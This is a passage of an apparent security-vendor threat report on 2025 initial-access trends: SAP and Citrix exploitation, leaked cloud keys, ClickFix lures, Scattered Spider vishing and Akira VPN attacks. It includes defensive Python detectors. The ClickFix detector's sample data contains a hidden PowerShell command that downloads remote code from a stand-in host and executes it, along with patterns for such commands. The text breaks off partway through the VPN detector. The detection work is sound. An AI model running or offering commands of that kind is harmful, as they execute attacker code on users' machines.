A CISO’s Checklist
Nine things you can do right now to protect your organization against the threats outlined in this report.
Take Action
Traditionally, attackers first gained access with low privileges, then worked to escalate, a delay that bought defenders time. In 2025, however, adversaries often secured high-level control from the very start. In 47% of customer incidents, attackers entered with elevated privileges, shrinking the critical window defenders once had to detect escalation and enabling near-immediate movement to their primary objectives.
* Stat: 47% of incidents in which attackers entered with elevated privileges
In this section of the report, we break down the entry techniques we saw in real-world customer incidents. We start with the deception-led attacks that defined the year, then shift to exposure-led access, dissecting the 2025 vulnerability landscape.
These trends illustrate that defending the front door requires a two-pronged strategy: One that hardens human processes and identity controls against deception, and another that delivers comprehensive asset visibility with rapid mitigation for technical exposures across the hybrid enterprise.
Unlike phishing and other user-driven initial access techniques, perimeter exploitation doesn’t require persuasion—only something reachable and trusted left in an exploitable state. Whether it’s a zero-day flaw, a refreshed variant of an established vulnerability, or a cloud misconfiguration, the outcome is the same: rapid initial access and expansion.
The crux of the problem lies in visibility and resilience. Defenders need to know what they own, what’s exposed, and what they can’t reliably see. They should then layer controls to achieve defense in depth against the known unknowns, but focus on detecting and containing what happens after entry, not just the specific exploit used.
The case studies that follow demonstrate just how quickly exposure can become active compromise. Each attack took a different path to compromise: a zero-day, a previously exploited vulnerability given new life, and leaked credentials. But they all share the same outcome—initial access that outpaces conventional response.
Two of the year’s big vulnerability stories showed both ends of the exploitation spectrum: A truly novel zero-day weaponized within days, and an “infamous” vulnerability resurfacing with updated tradecraft and faster timelines. The enterprise risk is the same; that is, once a high-impact exposure becomes usable at scale, multiple operators pile on quickly. That forces defenders to rely on defense in depth and fast containment rather than a single control, signature, or patch window.
In April 2025, ReliaQuest identified a zero-day vulnerability in the technology integration platform SAP NetWeaver (CVE-2025-31324) with a CVSS score of 10.0. Initially suspected to be a remote file inclusion issue, we quickly confirmed it was an unrestricted file upload vulnerability. SAP subsequently released a patch. Within days, multiple threat actors adopted the same exploitation path, but post-exploitation tradecraft diverged rapidly, creating a snowball effect where one flaw produced many distinct intrusion patterns.
CVE-2025-31324 shows how attackers adapt by turning a single exploit into many variants that evolve over time. High-impact enterprise vulnerabilities deliver immediate ROI for attackers, and rapid reuse, combined with shifting tool sets, complicates attribution and overwhelms defenses by inspiring a chain reaction of exploitation. This preference also showed up in our analysis of vulnerability-related chatter on cybercriminal forums: Discussion and exploit sales focused on widely deployed enterprise security and infrastructure platforms, where one exploit can turn into thousands of potential victims.
* Figure 3: SAP Scattered Lapsus$ Hunters PoC post
Across attacks tied to this zero-day, the initial access method stayed consistent. Adversaries used the unrestricted file upload flaw to gain code execution and implant web shells, establishing a foothold deep in the environment. After entry, attacks got more complex. In some cases, attackers used the Heaven’s Gate anti-detection technique to execute 64-bit payloads from a 32-bit context, reducing the effectiveness of EDR coverage focused narrowly on the 32-bit subsystem.
Once inside and operating under the radar, the tool sets varied between actors. We saw payloads consistent with Brute Ratel (a commercial red-team command-and-control [C2] framework often abused by threat actors) and “PipeMagic,” which established backdoors via Windows named pipes, leveraging a built-in communication channel that evades network-based detection. The gap between a relatively simple entry method and highly advanced post-exploitation tools suggests a decoupled kill chain. This aligns with initial access broker (IAB) behavior: Secure entry and then sell access to other operators who bring their own tool kits.
This potential rotation of actors and snowball effect created a muddled landscape for defenders. Even with a consistent exploit vector, the post-exploitation footprint shifted with every new operator. Defenders couldn’t simply hunt for a single C2 signature or tool set to scope the breach, because the post-exploitation “smoke” changed depending on who had bought the fire.
When a vulnerability is new and exploitation is active, resilience can’t depend on a single control. Layer your defenses—rapid exposure identification and mitigation, strong identity controls, network segmentation, and behavior-based detection—to establish defense in depth. This approach holds even when any single layer fails. What matters then is detecting what attackers do after entry (establish persistence, escalate privileges, and move laterally), not which tool they choose.
2025 also showed us that old vulnerabilities matter just as much as new flaws. Instead of fading, they become playbooks. Attackers reuse what works, adjust the tradecraft, and apply it at scale.
We saw this play out in the days leading up to the public disclosure of Citrix Bleed 2 (CVE-2025-5777). We noticed suspicious activity on a customer’s Citrix NetScaler appliance. We observed unexpected session terminations, abnormal session reuse across multiple IP addresses, and traffic patterns originating from data-center hosting providers.
Further investigation confirmed that attackers had already weaponized the flaw. By extracting session tokens from memory, they bypassed authentication and appeared inside the network as legitimate users, then quickly pivoted into Active Directory (AD) reconnaissance and lateral movement—all before a patch was widely available.
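The first signal called out above, one session token appearing from several source addresses in quick succession, is straightforward to hunt for in appliance access logs. The following is an added example (not ReliaQuest's code and not a Citrix feature): it groups access-log events by session ID, flags any session used from two or more distinct IPs inside a 30-minute window, and tags which of those IPs fall in ranges an analyst has labelled as hosting providers. The events and the hosting-provider range are constructed for illustration.

```python
# Added example (not ReliaQuest's code): flag a web session token seen from
# several source IPs inside a short window, one of the signals described above.
# Sample events and the "hosting provider" range are constructed for illustration.
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed sample access-log events: (timestamp, session_id, source_ip, user)
SAMPLE_EVENTS = [
    ("2025-06-20T10:00:00", "sess-A1", "203.0.113.10", "jdoe"),
    ("2025-06-20T10:03:00", "sess-A1", "203.0.113.10", "jdoe"),
    ("2025-06-20T10:05:00", "sess-A1", "198.51.100.77", "jdoe"),  # same token, new IP
    ("2025-06-20T10:06:00", "sess-A1", "198.51.100.78", "jdoe"),  # and another
    ("2025-06-20T11:00:00", "sess-B2", "203.0.113.44", "asmith"),
    ("2025-06-20T11:30:00", "sess-B2", "203.0.113.44", "asmith"),
]

# Constructed: ranges an analyst has tagged as data-center / hosting providers.
HOSTING_RANGES = [ip_network("198.51.100.0/24")]


def is_hosting(ip):
    """True if the address falls in a known hosting-provider range."""
    addr = ip_address(ip)
    return any(addr in net for net in HOSTING_RANGES)


def find_session_reuse(events, window=timedelta(minutes=30), min_ips=2):
    """Return one finding per session whose token is used from >= min_ips
    distinct source IPs within `window`. A valid session normally stays on
    one client address; a token lifted from appliance memory and replayed
    elsewhere does not."""
    by_session = defaultdict(list)
    for ts, sid, ip, user in events:
        by_session[sid].append((datetime.fromisoformat(ts), ip, user))

    findings = []
    for sid, rows in by_session.items():
        rows.sort()
        for i, (t0, _, user) in enumerate(rows):
            # distinct IPs seen from this event to the end of the window
            ips = {ip for t, ip, _ in rows[i:] if t - t0 <= window}
            if len(ips) >= min_ips:
                findings.append({
                    "session_id": sid,
                    "user": user,
                    "window_start": t0.isoformat(),
                    "source_ips": sorted(ips),
                    "hosting_ips": sorted(ip for ip in ips if is_hosting(ip)),
                })
                break  # one finding per session is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_session_reuse(SAMPLE_EVENTS):
        print(finding)
```

On real data the same logic runs over NetScaler access logs or the SIEM table they land in; the window and IP threshold are the tuning knobs, and the hosting-range tag is what separates a roaming laptop from a replayed token.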
This is why “infamous” vulnerabilities matter long after their disclosure. The original Citrix Bleed (2023) was more than just a one-time incident wave. It taught attackers where to look, what success looks like operationally, and how defenders tend to respond. When similar conditions emerged again, threat actors moved quickly, even without a public proof of concept (PoC).
Patching remains essential, but it doesn’t eliminate risk on its own. And it doesn’t always arrive before exploitation begins. Attackers iterate on familiar exploit themes and move quickly against exposed systems, creating a recurring cycle of old techniques and new CVEs. And with advancements in AI, these cycles are likely to accelerate, making it faster for attackers to identify and exploit recurring weaknesses in complex attack surfaces.
Defenders need sustained visibility into exploitation behavior and the ability to respond before session hijacking or lateral movement turns an exposed service into a breach.
New CVEs and high-profile vulnerabilities can be weaponized at speed, but the cloud incidents we investigated in 2025 followed a simpler pattern. Attackers didn’t need a breakthrough vulnerability when misconfigurations and over-privileged identities provided an easier path.
Across incidents in customer cloud environments last year, the highest-impact activity mapped back to 2 preventable failures:
Identity and Access Management (IAM): IAM issues emerged as the primary source of cloud risk, accounting for 44% of alerts; within those, 52% involved privilege escalation. Nearly half of verified cloud incidents involved abuse of valid credentials, often tied to over-privileged cloud identities. Wildcard permissions (*) and excessive administrative roles remain prime targets for attackers as they make escalation and high-impact access straightforward.
Process breakdowns: Compute resources (virtual machines [VMs], serverless functions, and containers) were involved in 43% of incidents, often through misconfigurations like exposed storage buckets, unpatched vulnerabilities, and overly permissive network rules. Mismanaged permissions in Continuous Integration and Continuous Delivery (CI/CD) pipelines were particularly dangerous, enabling lateral movement across environments. By compromising a single pipeline configuration, attackers could hijack the automated deployment process, turning legitimate software delivery tools into a mechanism for pushing malicious code or infrastructure changes directly into production.
* Stat: 44% of cloud alerts originate from IAM issues
* Stat: 52% of those IAM alerts involve privilege escalation
* Stat: 43% of incidents involve compute resources
Attackers thrive on gaps in visibility, access control, and resource protection. Our investigations revealed that the most common missteps driving high-risk incidents included public exposure of sensitive resources and excessive privileges on vulnerable VMs.
Cloud interdependence compounds the effect of any misconfiguration. A misconfigured VM can become a gateway into CI/CD pipelines, collaboration tools, and automation frameworks. Attackers use that interconnectedness to turn a small foothold into broad compromise.
* Figure 4: Top cloud risks and misconfigurations
Many cloud security issues boil down to a single leaked credential. With valid credentials in hand, attackers can use automated tools to rapidly scan, validate, and exploit secrets, then pivot across interconnected cloud services. Organizations often struggle to detect credential misuse in real time due to visibility gaps in IAM logs and API usage patterns. These are blind spots that attackers can use to operate undetected for extended periods.
In one incident we analyzed, attackers used the legitimate open-source tool TruffleHog to scan public repositories and Slack channels for forgotten AWS keys. After validating them, they used the STS GetCallerIdentity API call to map permissions and identify over-privileged accounts.
From there, they located and drained sensitive data from S3 buckets while simultaneously scanning internal Slack workspaces for additional tokens. By abusing trust relationships in CI/CD pipelines, they moved laterally across services, effectively turning the organization's own automation infrastructure into the attack path.
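The sequence above, a key being validated and then immediately pointed at S3, leaves a recognizable trail in CloudTrail. The following is an added example (not ReliaQuest's code and not an AWS feature): it groups CloudTrail-style records by access key and alerts when a `GetCallerIdentity` call from an address outside that key's historical baseline is followed within ten minutes by bucket enumeration or object reads. The records and the per-key baseline are constructed for illustration.

```python
# Added example (not ReliaQuest's code): flag an access key whose first call
# from an unfamiliar source is GetCallerIdentity followed within minutes by
# S3 enumeration or downloads, the sequence described above. The CloudTrail-like
# records and the per-key source baseline are constructed for illustration.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed CloudTrail-style records (trimmed to the fields used here).
SAMPLE_TRAIL = [
    {"eventTime": "2025-08-01T09:00:00Z", "eventName": "GetCallerIdentity",
     "accessKeyId": "AKIAEXAMPLE0000001", "sourceIPAddress": "198.51.100.9"},
    {"eventTime": "2025-08-01T09:00:40Z", "eventName": "ListBuckets",
     "accessKeyId": "AKIAEXAMPLE0000001", "sourceIPAddress": "198.51.100.9"},
    {"eventTime": "2025-08-01T09:01:10Z", "eventName": "GetObject",
     "accessKeyId": "AKIAEXAMPLE0000001", "sourceIPAddress": "198.51.100.9",
     "requestParameters": {"bucketName": "finance-exports", "key": "q2.csv"}},
    {"eventTime": "2025-08-01T09:01:20Z", "eventName": "GetObject",
     "accessKeyId": "AKIAEXAMPLE0000001", "sourceIPAddress": "198.51.100.9",
     "requestParameters": {"bucketName": "finance-exports", "key": "q3.csv"}},
    # Benign: a CI key doing its usual job from its usual address.
    {"eventTime": "2025-08-01T12:00:00Z", "eventName": "GetCallerIdentity",
     "accessKeyId": "AKIAEXAMPLE0000002", "sourceIPAddress": "10.0.4.12"},
    {"eventTime": "2025-08-01T12:00:05Z", "eventName": "PutObject",
     "accessKeyId": "AKIAEXAMPLE0000002", "sourceIPAddress": "10.0.4.12",
     "requestParameters": {"bucketName": "build-artifacts", "key": "app.zip"}},
]

# Constructed baseline: addresses each key has been seen from before today.
KNOWN_SOURCES = {
    "AKIAEXAMPLE0000001": {"10.0.7.3"},
    "AKIAEXAMPLE0000002": {"10.0.4.12"},
}

# Read/enumerate calls that, right after key validation, look like data theft.
DATA_ACCESS = {"ListBuckets", "ListObjects", "ListObjectsV2", "GetObject"}


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_validation_then_access(trail, known_sources, window=timedelta(minutes=10)):
    """One alert per key: GetCallerIdentity from an address outside the key's
    baseline, followed within `window` by S3 enumeration or object reads."""
    by_key = defaultdict(list)
    for rec in trail:
        by_key[rec["accessKeyId"]].append(rec)

    alerts = []
    for key, recs in by_key.items():
        recs.sort(key=lambda r: parse_time(r["eventTime"]))
        for i, rec in enumerate(recs):
            if rec["eventName"] != "GetCallerIdentity":
                continue
            if rec["sourceIPAddress"] in known_sources.get(key, set()):
                continue  # validation from a familiar address is routine
            t0 = parse_time(rec["eventTime"])
            follow = [r for r in recs[i + 1:]
                      if parse_time(r["eventTime"]) - t0 <= window
                      and r["eventName"] in DATA_ACCESS]
            if follow:
                buckets = {r.get("requestParameters", {}).get("bucketName") for r in follow}
                alerts.append({
                    "accessKeyId": key,
                    "sourceIPAddress": rec["sourceIPAddress"],
                    "validatedAt": rec["eventTime"],
                    "followOnCalls": [r["eventName"] for r in follow],
                    "buckets": sorted(b for b in buckets if b),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_validation_then_access(SAMPLE_TRAIL, KNOWN_SOURCES):
        print(alert)
```

The baseline is what keeps this quiet: every SDK validates credentials, but a key validating itself from a never-seen address and then listing buckets is the leaked-key pattern, and the alert carries the bucket names an analyst needs to scope the exposure.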
A strong perimeter doesn’t matter if valid credentials are scattered inside the environment. One key left in a chat log is enough to bypass defenses, escalate privileges, and take full control of a cloud environment. Cloud misconfigurations can drive data breaches, regulatory fines, reputational damage, and operational disruption.
Organizations can stay ahead of a volatile vulnerability landscape and complex cloud risk by combining comprehensive visibility, actionable intelligence, and AI-driven automation. This ensures exposures are identified, prioritized, and remediated before attackers can exploit them.
You can’t reduce risk you can’t see. A unified view across on‑premises, cloud, and hybrid systems helps uncover hidden assets, shadow IT, and misconfigurations that attackers target first. Reducing exposure to rapidly exploited vulnerabilities and emerging zero-days with tools like GreyMatter Discover helps businesses shrink their reachable attack surface.
Pair internal exposure management with external threat monitoring from a service like GreyMatter Digital Risk Protection to spot vulnerability and zero-day signals before they translate into active exploitation. This enables faster prioritization of mitigations and reduces the likelihood of compromise.
Social Engineering Redefines How Attackers Gain Initial Access
The top initial access techniques in customer incidents have remained consistent since 2023. While supply-chain compromise and replication through removable media rounded out the top 5, the leading trio again jostled for the top spot. These tactics stay popular because they exploit human trust, curiosity, and moments of inattention at a scale defenders can’t reliably stop in real time.
What changed in 2025 wasn’t the “what,” but the “how.” Attackers executed these staples differently, with social engineering acting as the common accelerator across nearly every major initial access path.
The most impactful initial access methods covered in the following sections all lean on this theme: The fastest path to initial access is through people, not novelty. AI likely supported this shift by eliminating language barriers and lowering the effort required to craft convincing narratives.
ClickFix: From Copy-Paste to Compromise
“ClickFix” facilitated the delivery of 59% of the top malware families in 2025, showing that initial access lures have moved beyond “click the link” or “open the attachment.” ClickFix blends phishing-style social engineering (coaching users into taking a harmful action) with drive-by compromise (where the “trigger” can be as simple as visiting a webpage). And because the activity runs through legitimate system functions, it can slip past email gateways, sandboxes, and some endpoint detection systems—shifting the fight from perimeter prevention to defense in depth and catching follow-on endpoint and identity behavior that ClickFix sets in motion.
* Stat: 59% of the top malware families were delivered by ClickFix in 2025
Quiet Debut to Industrialized Abuse
First observed in October 2023, ClickFix is a social engineering technique that turns “troubleshooting” into an attack. Victims are tricked into running malicious commands themselves, often under the guise of completing a CAPTCHA, clearing a browser security warning, or installing a critical system update (see Figure 1).
* Stat: 200% surge in ClickFix-related activity
By early 2025, underground recruitment posts were advertising for ClickFix developers and “specialists.” After that, we observed a 200% surge in ClickFix-related activity as adversaries began industrializing the technique to scale it—operating more like legitimate businesses by hiring talent to expand capacity and increase returns. By late 2025, the prominent ransomware group “Interlock” had adopted ClickFix as a primary initial access method, a strong indication that the technique isn’t just a nuisance, but effective even for mature ransomware-as-a-service (RaaS) operations.
ClickFix is even outgrowing its Windows roots. We investigated incidents where macOS users were targeted via ClickFix, leading to the delivery of the “Atomic” macOS infostealer. By the end of 2025, the same playbook was being used to deploy payloads ranging from ransomware to cryptocurrency miners, showing how a single delivery method can support very different objectives.
* Figure 1: Common ClickFix Variations
Why Traditional Awareness Fails Against ClickFix
ClickFix is best countered by shifting attention from file- or link-based detections to risky user-initiated execution. Because the technique pushes targets to run commands through legitimate interfaces (like the Windows Run dialog) and often hides behind trusted brands like Cloudflare, Google Chrome, and Microsoft, defenses are strongest when they can detect and contain abnormal command execution and follow-on behavior holistically across endpoint and identity telemetry.
Traditional security awareness still matters, but the guidance must change. “Don’t click suspicious links” won’t catch ClickFix. Training should condition users to treat unexpected CAPTCHAs, browser warnings, and “urgent” update prompts as potential attack steps—especially in industries where web-based workflows and self-service troubleshooting are routine (such as the technology, finance, health care, and education sectors).
AI adds both opportunity and risk to this playbook. While we haven’t seen AI-generated ClickFix lures at scale yet, ClickFix is well-suited for AI augmentation, from generating personalized fake error messages based on a target’s browsing behavior to automatically creating localized versions in multiple languages.
To get in front of AI-based ClickFix attacks, organizations should pair user awareness with AI-assisted behavioral detection that can spot anomalous user actions consistent with ClickFix execution, enabling faster investigation and response as lure quality improves.
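The shift described above, from file- and link-based detections to risky user-initiated execution, comes down to one question in process telemetry: was a script host or download utility spawned from an interactive parent (Explorer's Run dialog, a browser) with a command line that hides its window, fetches something remote, or executes in memory? The following is an added example (not ReliaQuest's code and not a GreyMatter rule): it scores constructed process-creation events on exactly those traits. Field names mirror typical EDR/Sysmon process events but are an assumption; the sample events and `example.invalid` URLs are constructed.

```python
# Added example (not ReliaQuest's code): score process-creation events for the
# pattern ClickFix produces, a script host or download utility spawned from an
# interactive parent (Explorer's Run dialog or a browser) with a command line
# carrying hidden-window, download, or in-memory execution flags. The events are
# constructed; field names mirror typical EDR/Sysmon process telemetry.
import re

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (regex, label) pairs; each match adds one point to the event's score.
SUSPICIOUS_PATTERNS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", "remote download"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"https?://", "URL in command line"),
]

# Constructed process-creation events.
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS-0142", "user": "jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -NoProfile -ep bypass -c "iwr http://example.invalid/verify | iex"'},
    {"host": "WS-0142", "user": "jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/captcha"},
    # Benign: a build agent running a script, not an interactive user.
    {"host": "BLD-01", "user": "svc-build",
     "parent": r"C:\Program Files\Jenkins\jenkins.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\build\deploy.ps1"},
    # Benign: Explorer launching an ordinary application.
    {"host": "WS-0190", "user": "asmith",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons). Score is 0 unless a script host is spawned from an
    interactive parent; each suspicious command-line trait then adds a point."""
    parent, image = _basename(event["parent"]), _basename(event["image"])
    if parent not in INTERACTIVE_PARENTS or image not in SCRIPT_HOSTS:
        return 0, []
    reasons = [image + " spawned by interactive parent " + parent]
    for pattern, label in SUSPICIOUS_PATTERNS:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            reasons.append(label)
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=2):
    """Events scoring at or above threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["host"], "user": ev["user"],
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_PROCESS_EVENTS):
        print(hit)
```

The parent-process gate does most of the work: the same PowerShell flags from a build agent or a management tool score zero, while anything a user pasted into the Run dialog is judged on what it tries to do. Pair the hit with identity telemetry for the same user in the following minutes, which is the follow-on behavior the text recommends watching.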
Scattered Spider’s Social Engineering Drives Valid Account Abuse
ClickFix cast a wide net in 2025, but the year’s highest-impact intrusions took a sharper, more direct path: the IT help desk, i.e., the custodians of access. Adversaries manipulated support staff into handing over valid credentials, then blended into normal traffic and sidestepped the alarms that noisy exploits typically trigger. By reducing technical reliance in favor of simpler, bolder, and faster tactics, attackers like “Scattered Spider” proved that the deadliest route to initial access is a legitimate identity—willingly handed over by someone who’s been deceived.
In September 2025, UK authorities arrested alleged “Scattered Spider” member “EarthtoStar” in connection with over 120 network intrusions targeting US organizations.
ReliaQuest shared research on Scattered Spider's evolving tactics with law enforcement as part of an ongoing information-sharing partnership.
The arrest, along with other arrests of individuals tied to Scattered Spider in 2025, likely disrupted the group's operations and forced remaining members to tighten operational security, temporarily reducing its high-profile targeting.
Scattered Spider Masters Human Exploitation
This identity-centric playbook has become the signature move of the Scattered Spider collective (aka “Octo-Tempest,” “UNC3944”). Active since 2022, this native-English-speaking group applied its tradecraft en masse in 2025, shifting from targeted strikes to widespread campaigns. The group’s focus stayed consistent across campaigns: Compromise platforms that provide centralized access, then pivot across the entire environment, hitting the finance, insurance, retail trade, and airline sectors in waves.
In multiple engagements, we saw attackers coerce IT administrators into resetting passwords or registering new MFA devices, effectively converting legitimate identities into attacker-controlled accounts. By impersonating executives, they exploited the inherent trust placed in internal requests to bypass verification protocols. In one investigated incident, Scattered Spider impersonated a CFO and used pre-collected personal information—such as date of birth and Social Security Number (SSN) fragments—to pass identity verification checks.
High-ranking employees often have extensive public-facing internet footprints, giving attackers the raw material to prepare, remove common roadblocks, and secure high-level privileges upfront. In one incident, once those permissions were in place, the pivot from initial entry to full system compromise took just 4 minutes.
In our analysis of Scattered Spider voice phishing (vishing) calls, we found considerable expertise in psychological manipulation: confident corporate jargon, urgent tones to build rapport, and accents that occasionally “faded” or sometimes shifted to match the recipient. When help-desk agents pushed back, the attackers persisted, cycling calls until they reached someone who yielded. Their native English fluency made these interactions more credible and harder to dismiss than traditional vishing.
Social Engineering Featured in 26% of Incidents in 2025
In 2025, instead of bypassing security controls, attackers convinced people to disable them. Relying on employee impersonation and vishing, this approach, like ClickFix, reinforced one of the year’s defining patterns: attackers manipulating human decisions to gain access. In fact, 1 in 4 incidents we responded to in 2025 involved social engineering. By turning trusted organizational processes into tools for compromise, these attacks demonstrate that even the most expensive security stacks struggle against a valid account issued to the wrong person.
* Stat: 26% of incidents involved social engineering for initial access
As long as human verification remains the fallback for account recovery and MFA resets, social engineering will persist. Preventative verification isn’t foolproof, so the priority must shift to detecting the signals that follow a successful help-desk compromise—such as a password reset and immediate lateral movement—and responding in seconds, before valid access turns into a full-scale breach.
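The signals named above, a help-desk-assisted reset followed by a new MFA device, a sign-in from an unfamiliar address, and immediate movement to other systems, can be correlated from identity-provider and directory logs in a single pass. The following is an added example (not ReliaQuest's code and not a GreyMatter detection): it finds password resets performed by someone other than the account owner and scores what that account does in the next 30 minutes. The events, the per-user IP baseline, and the weights are constructed for illustration.

```python
# Added example (not ReliaQuest's code): correlate a help-desk-assisted password
# reset with what follows it for the same account, the post-compromise signals
# described above. The identity events and the per-user IP baseline are constructed.
from datetime import datetime, timedelta

# Constructed identity-provider / directory events.
SAMPLE_IDENTITY_EVENTS = [
    {"time": "2025-09-10T14:02:00", "type": "PasswordReset", "actor": "helpdesk.t1",
     "target": "cfo.jane", "src_ip": "10.1.1.5"},
    {"time": "2025-09-10T14:04:00", "type": "MfaDeviceRegistered", "actor": "cfo.jane",
     "target": "cfo.jane", "src_ip": "203.0.113.80"},
    {"time": "2025-09-10T14:06:00", "type": "Login", "actor": "cfo.jane",
     "target": "cfo.jane", "src_ip": "203.0.113.80"},
    {"time": "2025-09-10T14:09:00", "type": "RemoteLogon", "actor": "cfo.jane",
     "target": "FS-01", "src_ip": "203.0.113.80"},
    # Benign: self-service reset, then normal work from the user's usual address.
    {"time": "2025-09-10T15:00:00", "type": "PasswordReset", "actor": "bob",
     "target": "bob", "src_ip": "10.1.2.9"},
    {"time": "2025-09-10T15:20:00", "type": "Login", "actor": "bob",
     "target": "bob", "src_ip": "10.1.2.9"},
]

# Constructed baseline of addresses each user normally signs in from.
KNOWN_USER_IPS = {"cfo.jane": {"10.1.1.20"}, "bob": {"10.1.2.9"}}

# Points per follow-on signal; an alert fires at ALERT_THRESHOLD.
WEIGHTS = {"MfaDeviceRegistered": 2, "NewIpLogin": 2, "RemoteLogon": 2}
ALERT_THRESHOLD = 4


def _t(value):
    return datetime.fromisoformat(value)


def detect_helpdesk_takeover(events, known_ips, window=timedelta(minutes=30)):
    """For each password reset performed by someone other than the account owner,
    score what the account does in the next `window` and alert on takeover-like
    sequences (new MFA device, sign-in from an unknown IP, remote logon)."""
    events = sorted(events, key=lambda e: _t(e["time"]))
    alerts = []
    for reset in events:
        if reset["type"] != "PasswordReset" or reset["actor"] == reset["target"]:
            continue  # self-service resets are out of scope here
        user, t0 = reset["target"], _t(reset["time"])
        score, signals = 0, []
        for ev in events:
            if ev["actor"] != user or not (t0 < _t(ev["time"]) <= t0 + window):
                continue
            if ev["type"] == "MfaDeviceRegistered":
                score += WEIGHTS["MfaDeviceRegistered"]
                signals.append("new MFA device registered")
            elif ev["type"] == "Login" and ev["src_ip"] not in known_ips.get(user, set()):
                score += WEIGHTS["NewIpLogin"]
                signals.append("login from unknown IP " + ev["src_ip"])
            elif ev["type"] == "RemoteLogon":
                score += WEIGHTS["RemoteLogon"]
                signals.append("remote logon to " + ev["target"])
        if score >= ALERT_THRESHOLD:
            alerts.append({"user": user, "reset_by": reset["actor"],
                           "reset_at": reset["time"], "score": score,
                           "signals": signals})
    return alerts


if __name__ == "__main__":
    for alert in detect_helpdesk_takeover(SAMPLE_IDENTITY_EVENTS, KNOWN_USER_IPS):
        print(alert)
```

The point of anchoring on the reset rather than on any single follow-on event is speed: the reset is the earliest moment a help-desk compromise is visible, and the scoring lets a response playbook (session revocation, MFA re-verification) trigger within the window the text describes, before the remote logon becomes lateral movement.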
Akira Exploits Public-Facing Devices: M&A Creates Hidden Risk
Exploitation of public-facing devices remains a reliable entry point. In 2025, we saw the “Akira” ransomware group exploiting unpatched SonicWall VPN appliances inherited through mergers and acquisitions (M&A) as a fast, low-friction entry point into larger enterprises. One overlooked remote-access device, still used by employees, contractors, or third parties, can become a direct path to domain compromise and ransomware deployment before the acquired environment is fully brought under standard controls.
Akira’s VPN Fast Track to Ransomware Deployment
From June through October 2025, we investigated a wave of Akira incidents relentlessly targeting this gap, where attackers gained access by exploiting unpatched vulnerabilities such as CVE-2024-40766 or brute-forcing weak credentials, and then pivoted into enterprise environments.
Akira, a financially motivated ransomware group active since 2023 and known for double extortion, consistently targets remote connectivity infrastructure because it is trusted; always on; and heavily used by employees, contractors, and third parties.
To stay under the radar during these incidents, Akira masked authentication attempts behind virtual private servers (VPS), blending into legitimate traffic and making detection significantly more difficult for defenders relying on geo-blocking or basic IP reputation filtering.
Across multiple incidents, once the group established access, attackers reached a domain controller in an average of just 9.3 hours—and in some cases in as little as 5 hours. From there, lateral movement to ransomware deployment averaged just 1 hour.
* Stat: 9.3 hours, average time for attackers to reach a domain controller
* Stat: 1 hour, average time from lateral movement to ransomware deployment
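The entry pattern above, credential brute-forcing spread across VPS addresses so that no single IP trips a threshold, is best caught per account rather than per source. The following is an added example (not ReliaQuest's code and not a SonicWall feature): it parses constructed syslog-style VPN authentication lines and alerts when an account sees failures from several distinct hosting-provider addresses inside a short window and then a success from another hosting-provider address. The log format, the log lines, and the hosting range are constructed for illustration.

```python
# Added example (not ReliaQuest's code): surface brute-force / password-spray
# activity against a VPN from many hosting-provider addresses, and the success
# that follows it, which is the entry pattern described above. Log lines and the
# hosting-provider range are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed VPN authentication log lines (syslog-like, format is an assumption).
SAMPLE_VPN_LOG = """\
2025-07-14T02:00:01 vpn01 auth: user=jsmith result=FAIL src=198.51.100.21
2025-07-14T02:00:04 vpn01 auth: user=jsmith result=FAIL src=198.51.100.22
2025-07-14T02:00:07 vpn01 auth: user=jsmith result=FAIL src=198.51.100.23
2025-07-14T02:00:10 vpn01 auth: user=jsmith result=FAIL src=198.51.100.24
2025-07-14T02:00:13 vpn01 auth: user=jsmith result=FAIL src=198.51.100.25
2025-07-14T02:00:16 vpn01 auth: user=jsmith result=SUCCESS src=198.51.100.26
2025-07-14T08:15:00 vpn01 auth: user=mlee result=FAIL src=203.0.113.5
2025-07-14T08:15:20 vpn01 auth: user=mlee result=SUCCESS src=203.0.113.5
"""

HOSTING_RANGES = [ip_network("198.51.100.0/24")]  # constructed VPS range
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth: user=(?P<user>\S+) result=(?P<result>\S+) src=(?P<src>\S+)$"
)


def parse_vpn_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            records.append(rec)
    return records


def is_hosting(ip):
    return any(ip_address(ip) in net for net in HOSTING_RANGES)


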